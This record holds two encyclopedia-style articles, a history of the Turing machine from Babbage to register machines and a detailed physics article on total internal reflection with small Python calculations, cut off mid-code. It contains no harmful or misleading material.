Robin Gandy (1919–1995)—a student of Alan Turing (1912–1954), and his lifelong friend—traces the lineage of the notion of "calculating machine" back to Charles Babbage (circa 1834) and actually proposes "Babbage's Thesis": Gandy's analysis of Babbage's analytical engine describes the following five operations (cf. pp. 52–53): (1) the arithmetic functions +, −, ×, where − indicates "proper" subtraction: x − y = 0 if y ≥ x; (2) any sequence of operations is an operation; (3) iteration of an operation (repeating n times an operation P); (4) conditional iteration (repeating n times an operation P conditional on the "success" of test T); (5) conditional transfer (i.e., conditional "goto"). Gandy states that "the functions which can be calculated by (1), (2), and (4) are precisely those which are Turing computable." (p. 53). He cites other proposals for "universal calculating machines", including those of Percy Ludgate (1909), Leonardo Torres Quevedo (1914), Maurice d'Ocagne (1922), Louis Couffignal (1933), Vannevar Bush (1936), and Howard Aiken (1937). However:

The Entscheidungsproblem (the "decision problem"): Hilbert's tenth question of 1900
With regard to Hilbert's problems posed by the famous mathematician David Hilbert in 1900, an aspect of problem #10 had been floating about for almost 30 years before it was framed precisely. Hilbert's original expression for No. 10 is as follows: By 1922, this notion of "Entscheidungsproblem" had developed a bit, and H. Behmann stated that By the 1928 international congress of mathematicians, Hilbert "made his questions quite precise. First, was mathematics complete ... Second, was mathematics consistent ... And thirdly, was mathematics decidable?" (Hodges p. 91, Hawking p. 1121). The first two questions were answered in 1930 by Kurt Gödel at the very same meeting where Hilbert delivered his retirement speech (much to the chagrin of Hilbert); the third—the Entscheidungsproblem—had to wait until the mid-1930s. The problem was that an answer first required a precise definition of "definite general applicable prescription", which Princeton professor Alonzo Church would come to call "effective calculability", and in 1928 no such definition existed. But over the next 6–7 years Emil Post developed his definition of a worker moving from room to room writing and erasing marks per a list of instructions (Post 1936), as did Church and his two students Stephen Kleene and J. B. Rosser by use of Church's lambda-calculus and Gödel's recursion theory (1934). Church's paper (published 15 April 1936) showed that the Entscheidungsproblem was indeed "undecidable" and beat Turing to the punch by almost a year (Turing's paper submitted 28 May 1936, published January 1937). In the meantime, Emil Post submitted a brief paper in the fall of 1936, so Turing at least had priority over Post.
While Church refereed Turing's paper, Turing had time to study Church's paper and add an Appendix where he sketched a proof that Church's lambda-calculus and his machines would compute the same functions. And Post had only proposed a definition of calculability and criticised Church's "definition", but had proved nothing.

Alan Turing's a-machine
In the spring of 1935, Turing, as a young Master's student at King's College, Cambridge, took on the challenge; he had been stimulated by the lectures of the logician M. H. A. Newman "and learned from them of Gödel's work and the Entscheidungsproblem ... Newman used the word 'mechanical' ... In his obituary of Turing 1955 Newman writes: Gandy states that: While Gandy believed that Newman's statement above is "misleading", this opinion is not shared by all. Turing had a lifelong interest in machines: "Alan had dreamt of inventing typewriters as a boy; [his mother] Mrs. Turing had a typewriter; and he could well have begun by asking himself what was meant by calling a typewriter 'mechanical'" (Hodges p. 96). While at Princeton pursuing his PhD, Turing built a Boolean-logic multiplier (see below). His PhD thesis, titled "Systems of Logic Based on Ordinals", contains the following definition of "a computable function": Turing invented the "a-machine" (automatic machine) in 1936 and submitted his paper on 31 May 1936 to the London Mathematical Society for its Proceedings (cf. Hodges 1983:112), but it was published in early 1937 and offprints were available in February 1937 (cf. Hodges 1983:129). As noted in the introduction, it was Turing's doctoral advisor, Alonzo Church, who later coined the term "Turing machine" in a review, and it was with this model that Turing answered in the negative the questions of whether a machine can determine whether any arbitrary machine on its tape is "circular" or ever prints a given symbol, thereby proving in particular the uncomputability of the Entscheidungsproblem ('decision problem'). When Turing returned to the UK he ultimately became jointly responsible for breaking the German secret codes created by encryption machines called "The Enigma"; he also became involved in the design of the ACE (Automatic Computing Engine): "[Turing's] ACE proposal was effectively self-contained, and its roots lay not in the EDVAC [the USA's initiative], but in his own universal machine" (Hodges p. 318). Arguments still continue concerning the origin and nature of what has been named by Kleene (1952) Turing's Thesis. But what Turing did prove with his computational-machine model appears in his paper "On Computable Numbers, with an Application to the Entscheidungsproblem" (1937). Turing's example (his second proof): if one is to ask for a general procedure to tell us: "Does this machine ever print 0?", the question is "undecidable".

1937–1970: The "digital computer", the birth of "computer science"
In 1937, while at Princeton working on his PhD thesis, Turing built a digital (Boolean-logic) multiplier from scratch, making his own electromechanical relays (Hodges p. 138). "Alan's task was to embody the logical design of a Turing machine in a network of relay-operated switches ..." (Hodges p. 138).
While Turing might initially have been just curious and experimenting, quite-earnest work in the same direction was going on in Germany (Konrad Zuse (1938)) and in the United States (Howard Aiken and George Stibitz (1937)); the fruits of their labors were used by both the Axis and Allied militaries in World War II (cf. Hodges pp. 298–299). In the early to mid-1950s Hao Wang and Marvin Minsky reduced the Turing machine to a simpler form (a precursor to the Post–Turing machine of Martin Davis); simultaneously European researchers were reducing the new-fangled electronic computer to a computer-like theoretical object equivalent to what was now being called a "Turing machine". In the late 1950s and early 1960s, the coincidentally parallel developments of Melzak and Lambek (1961), Minsky (1961), and Shepherdson and Sturgis (1961) carried the European work further and reduced the Turing machine to a more friendly, computer-like abstract model called the counter machine; Elgot and Robinson (1964), Hartmanis (1971), and Cook and Reckhow (1973) carried this work even further with the register machine and random-access machine models—but basically all are just multi-tape Turing machines with an arithmetic-like instruction set.

1970–present: as a model of computation
Today, the counter, register and random-access machines and their sire the Turing machine continue to be the models of choice for theorists investigating questions in the theory of computation. In particular, computational complexity theory makes use of the Turing machine:
Mathematics
Computability theory
null
30426
https://en.wikipedia.org/wiki/Total%20internal%20reflection
Total internal reflection
In physics, total internal reflection (TIR) is the phenomenon in which waves arriving at the interface (boundary) from one medium to another (e.g., from water to air) are not refracted into the second ("external") medium, but completely reflected back into the first ("internal") medium. It occurs when the second medium has a higher wave speed (i.e., lower refractive index) than the first, and the waves are incident at a sufficiently oblique angle on the interface. For example, the water-to-air surface in a typical fish tank, when viewed obliquely from below, reflects the underwater scene like a mirror with no loss of brightness (Fig.1). TIR occurs not only with electromagnetic waves such as light and microwaves, but also with other types of waves, including sound and water waves. If the waves are capable of forming a narrow beam (Fig.2), the reflection tends to be described in terms of "rays" rather than waves; in a medium whose properties are independent of direction, such as air, water or glass, the "rays" are perpendicular to the associated wavefronts. Total internal reflection occurs when the critical angle is exceeded. Refraction is generally accompanied by partial reflection. When waves are refracted from a medium of lower propagation speed (higher refractive index) to a medium of higher propagation speed (lower refractive index)—e.g., from water to air—the angle of refraction (between the outgoing ray and the surface normal) is greater than the angle of incidence (between the incoming ray and the normal). As the angle of incidence approaches a certain threshold, called the critical angle, the angle of refraction approaches 90°, at which the refracted ray becomes parallel to the boundary surface. As the angle of incidence increases beyond the critical angle, the conditions of refraction can no longer be satisfied, so there is no refracted ray, and the partial reflection becomes total. For visible light, the critical angle is about 49° for incidence from water to air, and about 42° for incidence from common glass to air. Details of the mechanism of TIR give rise to more subtle phenomena. While total reflection, by definition, involves no continuing flow of power across the interface between the two media, the external medium carries a so-called evanescent wave, which travels along the interface with an amplitude that falls off exponentially with distance from the interface. The "total" reflection is indeed total if the external medium is lossless (perfectly transparent), continuous, and of infinite extent, but can be conspicuously less than total if the evanescent wave is absorbed by a lossy external medium ("attenuated total reflectance"), or diverted by the outer boundary of the external medium or by objects embedded in that medium ("frustrated" TIR). Unlike partial reflection between transparent media, total internal reflection is accompanied by a non-trivial phase shift (not just zero or 180°) for each component of polarization (perpendicular or parallel to the plane of incidence), and the shifts vary with the angle of incidence. The explanation of this effect by Augustin-Jean Fresnel, in 1823, added to the evidence in favor of the wave theory of light. The phase shifts are used by Fresnel's invention, the Fresnel rhomb, to modify polarization.
The efficiency of total internal reflection is exploited by optical fibers (used in telecommunications cables and in image-forming fiberscopes), and by reflective prisms, such as image-erecting Porro/roof prisms for monoculars and binoculars.

Optical description
Although total internal reflection can occur with any kind of wave that can be said to have oblique incidence, including (e.g.) microwaves and sound waves, it is most familiar in the case of light waves. Total internal reflection of light can be demonstrated using a semicircular-cylindrical block of common glass or acrylic glass. In Fig.3, a "ray box" projects a narrow beam of light (a "ray") radially inward. The semicircular cross-section of the glass allows the incoming ray to remain perpendicular to the curved portion of the air/glass surface, and hence to continue in a straight line towards the flat part of the surface, although its angle with the flat part varies. Where the ray meets the flat glass-to-air interface, the angle between the ray and the normal (perpendicular) to the interface is called the angle of incidence. If this angle is sufficiently small, the ray is partly reflected but mostly transmitted, and the transmitted portion is refracted away from the normal, so that the angle of refraction (between the refracted ray and the normal to the interface) is greater than the angle of incidence. For the moment, let us call the angle of incidence θ and the angle of refraction θt (where t is for transmitted, reserving r for reflected). As θ increases and approaches a certain "critical angle", denoted by θc (or sometimes θcr), the angle of refraction approaches 90° (that is, the refracted ray approaches a tangent to the interface), and the refracted ray becomes fainter while the reflected ray becomes brighter. As θ increases beyond θc, the refracted ray disappears and only the reflected ray remains, so that all of the energy of the incident ray is reflected; this is total internal reflection (TIR). In brief: If θ < θc, the incident ray is split, being partly reflected and partly refracted; if θ > θc, the incident ray suffers total internal reflection (TIR); none of it is transmitted.

Critical angle
The critical angle is the smallest angle of incidence that yields total reflection, or equivalently the largest angle for which a refracted ray exists. For light waves incident from an "internal" medium with a single refractive index n1, to an "external" medium with a single refractive index n2, the critical angle is given by θc = arcsin(n2/n1), and is defined if n2 ≤ n1. For some other types of waves, it is more convenient to think in terms of propagation velocities rather than refractive indices. The explanation of the critical angle in terms of velocities is more general and will therefore be discussed first. When a wavefront is refracted from one medium to another, the incident (incoming) and refracted (outgoing) portions of the wavefront meet at a common line on the refracting surface (interface). Let this line, denoted by L, move at velocity u across the surface, where u is measured normal to L (Fig.4). Let the incident and refracted wavefronts propagate with normal velocities v1 and v2 respectively, and let them make the dihedral angles θ1 and θ2 respectively with the interface.
From the geometry, v1 is the component of u in the direction normal to the incident wave, so that v1 = u sin θ1. Similarly, v2 = u sin θ2. Solving each equation for 1/u and equating the results, we obtain the general law of refraction for waves: sin θ1 / sin θ2 = v1 / v2 (Eq. 1). But the dihedral angle between two planes is also the angle between their normals. So θ1 is the angle between the normal to the incident wavefront and the normal to the interface, while θ2 is the angle between the normal to the refracted wavefront and the normal to the interface; and Eq. (1) tells us that the sines of these angles are in the same ratio as the respective velocities. This result has the form of "Snell's law", except that we have not yet said that the ratio of velocities is constant, nor identified θ1 and θ2 with the angles of incidence and refraction (called θ and θt above). However, if we now suppose that the properties of the media are isotropic (independent of direction), two further conclusions follow: first, the two velocities, and hence their ratio, are independent of their directions; and second, the wave-normal directions coincide with the ray directions, so that θ1 and θ2 coincide with the angles of incidence and refraction as defined above. Obviously the angle of refraction cannot exceed 90°. In the limiting case, we put θ2 = 90° and θ1 = θc in Eq. (1), and solve for the critical angle: θc = arcsin(v1/v2) (Eq. 2). In deriving this result, we retain the assumption of isotropic media in order to identify θ1 and θ2 with the angles of incidence and refraction. For electromagnetic waves, and especially for light, it is customary to express the above results in terms of refractive indices. The refractive index of a medium with normal velocity v is defined as n = c/v, where c is the speed of light in vacuum. Hence v1 = c/n1. Similarly, v2 = c/n2. Making these substitutions in Eqs. (1) and (2), we obtain sin θ1 / sin θ2 = n2 / n1 (Eq. 3) and θc = arcsin(n2/n1) (Eq. 4). Eq. (3) is the law of refraction for general media, in terms of refractive indices, provided that θ1 and θ2 are taken as the dihedral angles; but if the media are isotropic, then n1 and n2 become independent of direction, while θ1 and θ2 may be taken as the angles of incidence and refraction for the rays, and Eq. (4) follows. So, for isotropic media, Eqs. (3) and (4) together describe the behavior in Fig.5. According to Eq. (4), for incidence from water (n1 ≈ 1.333) to air (n2 ≈ 1), we have θc ≈ 48.6°, whereas for incidence from common or acrylic glass (n1 ≈ 1.50) to air (n2 ≈ 1), we have θc ≈ 41.8°. The arcsin function yielding θc is defined only if n2 ≤ n1 (that is, v2 ≥ v1). Hence, for isotropic media, total internal reflection cannot occur if the second medium has a higher refractive index (lower normal velocity) than the first. For example, there cannot be TIR for incidence from air to water; rather, the critical angle for incidence from water to air is the angle of refraction at grazing incidence from air to water (Fig.6). The medium with the higher refractive index is commonly described as optically denser, and the one with the lower refractive index as optically rarer. Hence it is said that total internal reflection is possible for "dense-to-rare" incidence, but not for "rare-to-dense" incidence.
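Eq. (4) is easy to check numerically; the following sketch (the function name is ours) reproduces the figures quoted in this article:

```python
import math

def critical_angle_deg(n1: float, n2: float) -> float:
    """Critical angle for incidence from index n1 to index n2 (requires n2 <= n1)."""
    return math.degrees(math.asin(n2 / n1))

print(critical_angle_deg(1.333, 1.0))  # water to air: ~48.6 degrees
print(critical_angle_deg(1.50, 1.0))   # glass to air: ~41.8 degrees
print(critical_angle_deg(2.42, 1.0))   # diamond to air: ~24.4 degrees
```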
Everyday examples
When standing beside an aquarium with one's eyes below the water level, one is likely to see fish or submerged objects reflected in the water-air surface (Fig.1). The brightness of the reflected image – just as bright as the "direct" view – can be startling. A similar effect can be observed by opening one's eyes while swimming just below the water's surface. If the water is calm, the surface outside the critical angle (measured from the vertical) appears mirror-like, reflecting objects below. The region above the water cannot be seen except overhead, where the hemispherical field of view is compressed into a conical field known as Snell's window, whose angular diameter is twice the critical angle (cf. Fig.6). The field of view above the water is theoretically 180° across, but seems less because as we look closer to the horizon, the vertical dimension is more strongly compressed by the refraction; e.g., by Eq. (3), for air-to-water incident angles of 90°, 80°, and 70°, the corresponding angles of refraction are 48.6° (θcr in Fig.6), 47.6°, and 44.8°, indicating that the image of a point 20° above the horizon is 3.8° from the edge of Snell's window while the image of a point 10° above the horizon is only 1° from the edge. Fig.7, for example, is a photograph taken near the bottom of the shallow end of a swimming pool. What looks like a broad horizontal stripe on the right-hand wall consists of the lower edges of a row of orange tiles, and their reflections; this marks the water level, which can then be traced across the other wall. The swimmer has disturbed the surface above her, scrambling the lower half of her reflection, and distorting the reflection of the ladder (to the right). But most of the surface is still calm, giving a clear reflection of the tiled bottom of the pool. The space above the water is not visible except at the top of the frame, where the handles of the ladder are just discernible above the edge of Snell's window – within which the reflection of the bottom of the pool is only partial, but still noticeable in the photograph. One can even discern the color-fringing of the edge of Snell's window, due to the variation of the refractive index, hence of the critical angle, with wavelength (see Dispersion). The critical angle influences the angles at which gemstones are cut. The round "brilliant" cut, for example, is designed to refract light incident on the front facets, reflect it twice by TIR off the back facets, and transmit it out again through the front facets, so that the stone looks bright. Diamond (Fig.8) is especially suitable for this treatment, because its high refractive index (about 2.42) and consequently small critical angle (about 24.5°) yield the desired behavior over a wide range of viewing angles. Cheaper materials that are similarly amenable to this treatment include cubic zirconia (index ≈ 2.15) and moissanite (non-isotropic, hence doubly refractive, with an index ranging from about 2.65 to 2.69, depending on direction and polarization); both of these are therefore popular as diamond simulants.

Evanescent wave
Mathematically, waves are described in terms of time-varying fields, a "field" being a function of location in space. A propagating wave requires an "effort" field and a "flow" field, the latter being a vector (if we are working in two or three dimensions). The product of effort and flow is related to power (see System equivalence). For example, for sound waves in a non-viscous fluid, we might take the effort field as the pressure (a scalar), and the flow field as the fluid velocity (a vector). The product of these two is intensity (power per unit area). For electromagnetic waves, we shall take the effort field as the electric field E and the flow field as the magnetizing field H. Both of these are vectors, and their vector product is again the intensity (see Poynting vector).
When a wave in (say) medium 1 is reflected off the interface between medium 1 and medium 2, the flow field in medium 1 is the vector sum of the flow fields due to the incident and reflected waves. If the reflection is oblique, the incident and reflected fields are not in opposite directions and therefore cannot cancel out at the interface; even if the reflection is total, either the normal component or the tangential component of the combined field (as a function of location and time) must be non-zero adjacent to the interface. Furthermore, the physical laws governing the fields will generally imply that one of the two components is continuous across the interface (that is, it does not suddenly change as we cross the interface); for example, for electromagnetic waves, one of the interface conditions is that the tangential component of H is continuous if there is no surface current. Hence, even if the reflection is total, there must be some penetration of the flow field into medium 2; and this, in combination with the laws relating the effort and flow fields, implies that there will also be some penetration of the effort field. The same continuity condition implies that the variation ("waviness") of the field in medium 2 will be synchronized with that of the incident and reflected waves in medium 1.

But, if the reflection is total, the spatial penetration of the fields into medium 2 must be limited somehow, or else the total extent and hence the total energy of those fields would continue to increase, draining power from medium 1. Total reflection of a continuing wavetrain permits some energy to be stored in medium 2, but does not permit a continuing transfer of power from medium 1 to medium 2.

Thus, using mostly qualitative reasoning, we can conclude that total internal reflection must be accompanied by a wavelike field in the "external" medium, traveling along the interface in synchronism with the incident and reflected waves, but with some sort of limited spatial penetration into the "external" medium; such a field may be called an evanescent wave.

Fig.9 shows the basic idea. The incident wave is assumed to be plane and sinusoidal. The reflected wave, for simplicity, is not shown. The evanescent wave travels to the right in lock-step with the incident and reflected waves, but its amplitude falls off with increasing distance from the interface. (Two features of the evanescent wave in Fig.9 are to be explained later: first, that the evanescent wave crests are perpendicular to the interface; and second, that the evanescent wave is slightly ahead of the incident wave.)

Frustrated total internal reflection (FTIR)

If the internal reflection is to be total, there must be no diversion of the evanescent wave. Suppose, for example, that electromagnetic waves incident from glass (with a higher refractive index) to air (with a lower refractive index) at a certain angle of incidence are subject to TIR. And suppose that we have a third medium (often identical to the first) whose refractive index is sufficiently high that, if the third medium were to replace the second, we would get a standard transmitted wavetrain for the same angle of incidence.
Then, if the third medium is brought within a distance of a few wavelengths from the surface of the first medium, where the evanescent wave has significant amplitude in the second medium, then the evanescent wave is effectively refracted into the third medium, giving non-zero transmission into the third medium, and therefore less than total reflection back into the first medium. As the amplitude of the evanescent wave decays across the air gap, the transmitted waves are attenuated, so that there is less transmission, and therefore more reflection, than there would be with no gap; but as long as there is some transmission, the reflection is less than total. This phenomenon is called frustrated total internal reflection (where "frustrated" negates "total"), abbreviated "frustrated TIR" or "FTIR".

Frustrated TIR can be observed by looking into the top of a glass of water held in one's hand (Fig.10). If the glass is held loosely, contact may not be sufficiently close and widespread to produce a noticeable effect. But if it is held more tightly, the ridges of one's fingerprints interact strongly with the evanescent waves, allowing the ridges to be seen through the otherwise totally reflecting glass-air surface.

The same effect can be demonstrated with microwaves, using paraffin wax as the "internal" medium (where the incident and reflected waves exist). In this case the permitted gap width might be (e.g.) 1 cm or several cm, which is easily observable and adjustable.

The term frustrated TIR also applies to the case in which the evanescent wave is scattered by an object sufficiently close to the reflecting interface. This effect, together with the strong dependence of the amount of scattered light on the distance from the interface, is exploited in total internal reflection microscopy.

The mechanism of FTIR is called evanescent-wave coupling, and is a good analog to visualize quantum tunneling. Due to the wave nature of matter, an electron has a non-zero probability of "tunneling" through a barrier, even if classical mechanics would say that its energy is insufficient. Similarly, due to the wave nature of light, a photon has a non-zero probability of crossing a gap, even if ray optics would say that its approach is too oblique.

Another reason why internal reflection may be less than total, even beyond the critical angle, is that the external medium may be "lossy" (less than perfectly transparent), in which case the external medium will absorb energy from the evanescent wave, so that the maintenance of the evanescent wave will draw power from the incident wave. The consequent less-than-total reflection is called attenuated total reflectance (ATR). This effect, and especially the frequency-dependence of the absorption, can be used to study the composition of an unknown external medium.

Derivation of evanescent wave

In a uniform plane sinusoidal electromagnetic wave, the electric field E has the form

 E = Ek e^{i(k⋅r − ωt)}, (5)

where Ek is the (constant) complex amplitude vector, i is the imaginary unit, k is the wave vector (whose magnitude k is the angular wavenumber), r is the position vector, ω is the angular frequency, t is time, and it is understood that the real part of the expression is the physical field. The magnetizing field H has the same form with the same k and ω. The value of the expression is unchanged if the position r varies in a direction normal to k; hence k is normal to the wavefronts.
If ℓ is the component of r in the direction of k, the field (5) can be written Ek e^{i(kℓ − ωt)}. If the argument of the exponential is to be constant, ℓ must increase at the velocity ω/k, known as the phase velocity. This in turn is equal to c/n, where c is the phase velocity in the reference medium (taken as vacuum), and n is the local refractive index w.r.t. the reference medium. Solving for k gives k = nω/c, i.e.

 k = n k0, (6)

where k0 = ω/c is the wavenumber in vacuum.

From (5), the electric field in the "external" medium has the form

 Et = Ekt e^{i(kt⋅r − ωt)}, (7)

where kt is the wave vector for the transmitted wave (we assume isotropic media, but the transmitted wave is not yet assumed to be evanescent).

In Cartesian coordinates (x, y, z), let the region y < 0 have refractive index n1, and let the region y > 0 have refractive index n2. Then the xz plane is the interface, and the y axis is normal to the interface (Fig.11). Let x̂ and ŷ be the unit vectors in the x and y directions, respectively. Let the plane of incidence (containing the incident wave-normal and the normal to the interface) be the xy plane (the plane of the page), with the angle of incidence θi measured from ŷ towards x̂. Let the angle of refraction, measured in the same sense, be θt ("t" for transmitted, reserving "r" for reflected).

From (6), the transmitted wave vector kt has magnitude n2 k0. Hence, from the geometry,

 kt = n2 k0 (x̂ sin θt + ŷ cos θt) = k0 (x̂ n1 sin θi + ŷ n2 cos θt),

where the last step uses Snell's law. Taking the dot product with the position vector, we get

 kt⋅r = k0 (n1 x sin θi + n2 y cos θt),

so that Eq.(7) becomes

 Et = Ekt e^{i[k0 (n1 x sin θi + n2 y cos θt) − ωt]}. (8)

In the case of TIR, the angle θt does not exist in the usual sense. But we can still interpret (8) for the transmitted (evanescent) wave, by allowing cos θt to be complex. This becomes necessary when we write cos θt in terms of sin θt, and thence in terms of sin θi using Snell's law:

 cos θt = √(1 − sin²θt) = √(1 − (n1/n2)² sin²θi).

For θi greater than the critical angle, the value under the square-root symbol is negative, so that

 cos θt = ±i √((n1/n2)² sin²θi − 1). (9)

To determine which sign is applicable, we substitute (9) into (8), obtaining

 Et = Ekt e^{∓k0 y √(n1² sin²θi − n2²)} e^{i(k0 n1 x sin θi − ωt)}, (10)

where the undetermined sign is the opposite of that in (9). For an evanescent transmitted wave – that is, one whose amplitude decays as y increases – the undetermined sign in (10) must be minus, so the undetermined sign in (9) must be plus.

With the correct sign, the result (10) can be abbreviated

 Et ∝ e^{−κy} e^{i(kx x − ωt)}, (11)

where

 κ = k0 √(n1² sin²θi − n2²),  kx = n1 k0 sin θi, (12)

and k0 is the wavenumber in vacuum, i.e. ω/c.

So the evanescent wave is a plane sinewave traveling in the x direction, with an amplitude that decays exponentially in the y direction (Fig.9). It is evident that the energy stored in this wave likewise travels in the x direction and does not cross the interface. Hence the Poynting vector generally has a component in the x direction, but its y component averages to zero (although its instantaneous y component is not identically zero).

Eq.(11) indicates that the amplitude of the evanescent wave falls off by a factor e as the coordinate y (measured from the interface) increases by the distance d = 1/κ, commonly called the "penetration depth" of the evanescent wave. Taking reciprocals of the first equation of (12), we find that the penetration depth is

 d = λ0 / (2π √(n1² sin²θi − n2²)),

where λ0 is the wavelength in vacuum, i.e. 2π/k0. Dividing the numerator and denominator by n2 yields

 d = λ2 / (2π √((n1/n2)² sin²θi − 1)),

where λ2 = λ0/n2 is the wavelength in the second (external) medium. Hence we can plot d in units of λ2 as a function of the angle of incidence, for various values of n1/n2 (Fig.12). As θi decreases towards the critical angle, the denominator approaches zero, so that d increases without limit – as is to be expected, because as soon as θi is less than critical, uniform plane waves are permitted in the external medium. As θi approaches 90° (grazing incidence), d approaches a minimum

 dmin = λ2 / (2π √((n1/n2)² − 1)).

For incidence from water to air, or common glass to air, dmin is not much different from λ2/(2π).
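The decay constant κ and the penetration depth are straightforward to evaluate. The Python sketch below uses the first equation of (12) for a glass-to-air interface; the 633 nm wavelength and the 45° angle are arbitrary illustrative choices, and the final loop only indicates the exponential amplitude scaling relevant to frustrated TIR, not a full multiple-reflection calculation:

    import math

    def kappa(n1, n2, theta_i_deg, wavelength_vacuum):
        # Eq.(12): kappa = k0 * sqrt(n1^2 sin^2(theta_i) - n2^2).
        k0 = 2 * math.pi / wavelength_vacuum
        s = n1 * math.sin(math.radians(theta_i_deg))
        return k0 * math.sqrt(s * s - n2 * n2)

    k = kappa(1.5, 1.0, 45.0, 633e-9)        # glass -> air, above theta_c ~ 41.8 deg
    print("penetration depth 1/kappa:", 1 / k)  # ~2.8e-7 m

    # Relative amplitude surviving across an air gap of width g (rough FTIR scaling):
    for g in (0.1e-6, 0.5e-6, 1.0e-6):
        print(g, math.exp(-k * g))           # ~0.70, ~0.17, ~0.03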
But d is larger at smaller angles of incidence (Fig.12), and the amplitude may still be significant at distances of several times d; for example, because e^−4.6 is just greater than 0.01, the evanescent wave amplitude within a distance 4.6d of the interface is at least 1% of its value at the interface. Hence, speaking loosely, we tend to say that the evanescent wave amplitude is significant within "a few wavelengths" of the interface.

Phase shifts

Between 1817 and 1823, Augustin-Jean Fresnel discovered that total internal reflection is accompanied by a non-trivial phase shift (that is, a phase shift that is not restricted to 0° or 180°), as the Fresnel reflection coefficient acquires a non-zero imaginary part. We shall now explain this effect for electromagnetic waves in the case of linear, homogeneous, isotropic, non-magnetic media. The phase shift turns out to be an advance, which grows as the incidence angle increases beyond the critical angle, but which depends on the polarization of the incident wave.

In equations (5), (7), (8), (10), and (11), we advance the phase by the angle ϕ if we replace ωt by ωt+ϕ (that is, if we replace −ωt by −(ωt+ϕ)), with the result that the (complex) field is multiplied by e^−iϕ. So a phase advance is equivalent to multiplication by a complex constant with a negative argument. This becomes more obvious when (e.g.) the field (5) is factored as Ek e^{ik⋅r} e^{−iωt}, where the last factor contains the time dependence.

To represent the polarization of the incident, reflected, or transmitted wave, the electric field adjacent to an interface can be resolved into two perpendicular components, known as the s and p components, which are parallel to the surface and the plane of incidence, respectively; in other words, the s and p components are respectively perpendicular and parallel to the plane of incidence.

For each component of polarization, the incident, reflected, or transmitted electric field (Ek in Eq.(5)) has a certain direction and can be represented by its (complex) scalar component in that direction. The reflection or transmission coefficient can then be defined as a ratio of complex components at the same point, or at infinitesimally separated points on opposite sides of the interface. But, in order to fix the signs of the coefficients, we must choose positive senses for the "directions". For the s components, the obvious choice is to say that the positive directions of the incident, reflected, and transmitted fields are all the same (e.g., the z direction in Fig.11). For the p components, this article adopts the convention that the positive directions of the incident, reflected, and transmitted fields are inclined towards the same medium (that is, towards the same side of the interface, e.g. like the red arrows in Fig.11). But the reader should be warned that some books use a different convention for the p components, causing a different sign in the resulting formula for the reflection coefficient.

For the s polarization, let the reflection and transmission coefficients be rs and ts respectively. For the p polarization, let the corresponding coefficients be rp and tp. Then, for linear, homogeneous, isotropic, non-magnetic media, the coefficients are given by:

 rs = (n1 cos θi − n2 cos θt) / (n1 cos θi + n2 cos θt) (13)

 ts = 2 n1 cos θi / (n1 cos θi + n2 cos θt) (14)

 rp = (n2 cos θi − n1 cos θt) / (n2 cos θi + n1 cos θt) (15)

 tp = 2 n1 cos θi / (n2 cos θi + n1 cos θt). (16)

(For a derivation of the above, see the article on the Fresnel equations.)

Now we suppose that the transmitted wave is evanescent. With the correct sign (+), substituting (9) into (13) gives

 rs = (n cos θi − i √(n² sin²θi − 1)) / (n cos θi + i √(n² sin²θi − 1)),

where

 n = n1/n2;

that is, n is the index of the "internal" medium relative to the "external" one, or the index of the internal medium if the external one is vacuum.
So the magnitude of rs is 1, and the argument of rs is

 −2 arctan( √(n² sin²θi − 1) / (n cos θi) ),

which gives a phase advance of

 δs = 2 arctan( √(n² sin²θi − 1) / (n cos θi) ). (17)

Making the same substitution in (14), we find that ts has the same denominator as rs, with a positive real numerator (instead of a complex-conjugate numerator), and therefore has half the argument of rs, so that the phase advance of the evanescent wave is half that of the reflected wave.

With the same choice of sign, substituting (9) into (15) gives

 rp = (cos θi − i n √(n² sin²θi − 1)) / (cos θi + i n √(n² sin²θi − 1)),

whose magnitude is 1, and whose argument is

 −2 arctan( n √(n² sin²θi − 1) / cos θi ),

which gives a phase advance of

 δp = 2 arctan( n √(n² sin²θi − 1) / cos θi ). (18)

Making the same substitution in (16), we again find that the phase advance of the evanescent wave is half that of the reflected wave.

Equations (17) and (18) apply when θc ≤ θi < 90°, where θi is the angle of incidence, and θc is the critical angle arcsin(1/n). These equations show that each phase advance is zero at the critical angle (for which the numerator is zero); each phase advance approaches 180° as θi → 90°; and δp > δs at intermediate values of θi (because the factor n is in the numerator of (18) and the denominator of (17)).

For θi ≤ θc, the reflection coefficients are given by equations (13) and (15) and are real, so that the phase shift is either 0° (if the coefficient is positive) or 180° (if the coefficient is negative).

In (13), if we put n1 = n2 sin θt / sin θi (Snell's law) and multiply the numerator and denominator by (1/n2) sin θi, we obtain

 rs = sin(θt − θi) / sin(θt + θi), (19)

which is positive for all angles of incidence with a transmitted ray (since θt > θi), giving a phase shift of zero.

If we do likewise with (15), the result is easily shown to be equivalent to

 rp = tan(θi − θt) / tan(θi + θt), (20)

which is negative for small angles (that is, near normal incidence), but changes sign at Brewster's angle, where θi and θt are complementary. Thus the phase shift is 180° for small θi but switches to 0° at Brewster's angle. Combining the complementarity with Snell's law yields θi = arctan(1/n) as Brewster's angle for dense-to-rare incidence.

(Equations (19) and (20) are known as Fresnel's sine law and Fresnel's tangent law. Both reduce to 0/0 at normal incidence, but yield the correct results in the limit as θi → 0. That they have opposite signs as we approach normal incidence is an obvious disadvantage of the sign convention used in this article; the corresponding advantage is that they have the same signs at grazing incidence.)

That completes the information needed to plot δs and δp for all angles of incidence. This is done in Fig.13, with δp in red and δs in blue, for three refractive indices. On the angle-of-incidence scale (horizontal axis), Brewster's angle is where δp (red) falls from 180° to 0°, and the critical angle is where both δs and δp (red and blue) start to rise again. To the left of the critical angle is the region of partial reflection, where both reflection coefficients are real (phase 0° or 180°) with magnitudes less than 1. To the right of the critical angle is the region of total reflection, where both reflection coefficients are complex with magnitudes equal to 1. In that region, the black curves show the phase advance of the p component relative to the s component:

 δ = δp − δs.

It can be seen that a refractive index of 1.45 is not enough to give a 45° phase difference, whereas a refractive index of 1.5 is enough (by a slim margin) to give a 45° phase difference at two angles of incidence: about 50.2° and 53.3°. This 45° relative shift is employed in Fresnel's invention, now known as the Fresnel rhomb, in which the angles of incidence are chosen such that the two internal reflections cause a total relative phase shift of 90° between the two polarizations of an incident wave.
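These results can be checked by evaluating Eqs.(13) and (15) directly with the complex cos θt of Eq.(9). The Python sketch below (an illustration, with n1 = 1.5 and n2 = 1 as quoted above) relies on the fact that the principal complex square root of a negative real number supplies the required + sign; it confirms that both reflection coefficients have unit magnitude beyond the critical angle, and that the relative phase δp − δs is about 45° at the two quoted angles:

    import cmath, math

    def reflection_coefficients(n1, n2, theta_i_deg):
        # Eqs.(13) and (15), with cos(theta_t) from Eq.(9) beyond the critical
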